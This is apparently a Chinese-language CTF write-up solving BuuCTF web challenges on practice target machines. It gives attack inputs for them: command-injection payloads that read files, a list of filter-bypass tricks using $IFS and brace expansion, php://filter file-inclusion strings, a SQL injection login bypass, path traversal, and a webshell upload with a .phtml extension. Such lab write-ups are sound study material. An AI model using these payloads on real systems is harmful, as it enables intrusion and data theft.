BuuCTF_web

目录

[HCTF 2018]admin

[极客大挑战 2019]BuyFlag

 [ACTF2020 新生赛]Exec

[GXYCTF2019]Ping Ping Ping

[ACTF2020 新生赛]Include

[极客大挑战 2019]EasySQL

[极客大挑战 2019]Havefun

[HCTF 2018]WarmUp

[极客大挑战 2019]Secret File

[极客大挑战 2019]Upload 

[ACTF2020 新生赛]Upload


[HCTF 2018]admin

启动靶机

BuuCTF_web_第1张图片

进入登录页面,题目的提示是admin,所以可能是使用admin登录上去

BuuCTF_web_第2张图片

解法一:

我们发现使用弱口令,Username:admin,Password:123(弱口令),登录上去,获得flag

BuuCTF_web_第3张图片

解法二:

我们发现还有注册页面,但是无法注册账号为admin、ADMIN......

https://www.anquanke.com/post/id/164086#h3-7

由大佬的文章可得:可以使用ᴬᴰᴹᴵᴺ注册,密码为123,

BuuCTF_web_第4张图片

注册成功后,登录进去,然后进行改密码,改为456

BuuCTF_web_第5张图片

然后退出来,使用admin,456登录,获得flag

BuuCTF_web_第6张图片

查找还有两种方案,但是我不会

[极客大挑战 2019]BuyFlag

打开靶机,查看源码发现

BuuCTF_web_第7张图片

发现user的值为0,改为1,然后刷新页面 BuuCTF_web_第8张图片

发现这里发生了变化,使用Max HacKBar

BuuCTF_web_第9张图片

我们发现这里的Nember lenth is too long,所以使用money[]=1&password=404mochu,然后得到flag。BuuCTF_web_第10张图片

参考文献:

https://blog.csdn.net/mochu7777777/article/details/109501224

 [ACTF2020 新生赛]Exec

输入127.0.0.1

BuuCTF_web_第11张图片

 127.0.0.1 & ls;

127.0.0.1 & cat index.phpBuuCTF_web_第12张图片

 我们直接读取flag    127.0.0.1 & cat /flagBuuCTF_web_第13张图片

[GXYCTF2019]Ping Ping Ping

 BuuCTF_web_第14张图片

ls查询发现flag.php,cat flag.php发现不行,应该是过滤了

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X 

tip:有时会禁用cat:
解决方法是使用tac反向输出命令:
linux命令中可以加\,所以甚至可以ca\t /fl\ag

空格用$IFS$绕过后发现

?ip=127.0.0.1;a=f;cat$IFS$1$alag.php    过滤
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php	没flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php  	过滤
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php	有flag
?ip=127.0.0.1;a=fl;b=ag;cat$IFS$1$a$b.php 过滤
?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php 有flag

可能是过滤了flag,我们用/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php绕过,绕过后查看源码,发现flag

BuuCTF_web_第15张图片

[ACTF2020 新生赛]Include

BuuCTF_web_第16张图片

 ?file=php://filter/read=convert.base64-encode/resource=flag.php

 

得到的进行base64解密,得到

 BuuCTF_web_第17张图片

参考:

https://blog.csdn.net/TM_1024/article/details/106966460

[极客大挑战 2019]EasySQL

使用万能密码1' or '1' = '1

BuuCTF_web_第18张图片

得到flag

BuuCTF_web_第19张图片

[极客大挑战 2019]Havefun

打开源码,有发现

BuuCTF_web_第20张图片

cat=dog,得到flag

BuuCTF_web_第21张图片

[HCTF 2018]WarmUp

BuuCTF_web_第22张图片

查看源码发现source.php,打开发现BuuCTF_web_第23张图片

访问hint.php

BuuCTF_web_第24张图片

没有flag,再回来分析源码

没有flag,那我们继续 source.php?file=source.php?../../../../../ffffllllaaaagggg得到flag 

BuuCTF_web_第25张图片

[极客大挑战 2019]Secret File

进入查看源代码,发现Archive_room.php

BuuCTF_web_第26张图片

进入Archive_room.php,

BuuCTF_web_第27张图片

发现什么都没有,进行查看,发现没有什么,试一下抓包,有了发现,发现了这个secr3t.php

BuuCTF_web_第28张图片BuuCTF_web_第29张图片

 我们发现这里有php,一看就是文件包含,接下来进行代码审计(难受)

这里使用文件包含伪协议https://blog.csdn.net/Wu000999/article/details/101925271

 所以使用:file=php://filter/read=convert.base64-encode/resource=./flag.php

BuuCTF_web_第30张图片

这里出现base64,进行解密,得到 

 BuuCTF_web_第31张图片

flag就在其中

[极客大挑战 2019]Upload 

BuuCTF_web_第32张图片

发现过滤了<,上传jpg图片也不成功

BuuCTF_web_第33张图片

进行抓包,发现文件后缀必须为image/jpegBuuCTF_web_第34张图片 

一句话木马

GIF89a?

 绕过<,php利用phtml绕过

BuuCTF_web_第35张图片

BuuCTF_web_第36张图片  

上传成功,我们现在使用蚁剑连接

BuuCTF_web_第37张图片

BuuCTF_web_第38张图片

然后找到flag

[ACTF2020 新生赛]Upload

上传jpg文件,改为php上传失败,然后改为phtml发现上传成功,用蚁剑连接

 BuuCTF_web_第39张图片BuuCTF_web_第40张图片

BuuCTF_web_第41张图片

你可能感兴趣的:(web)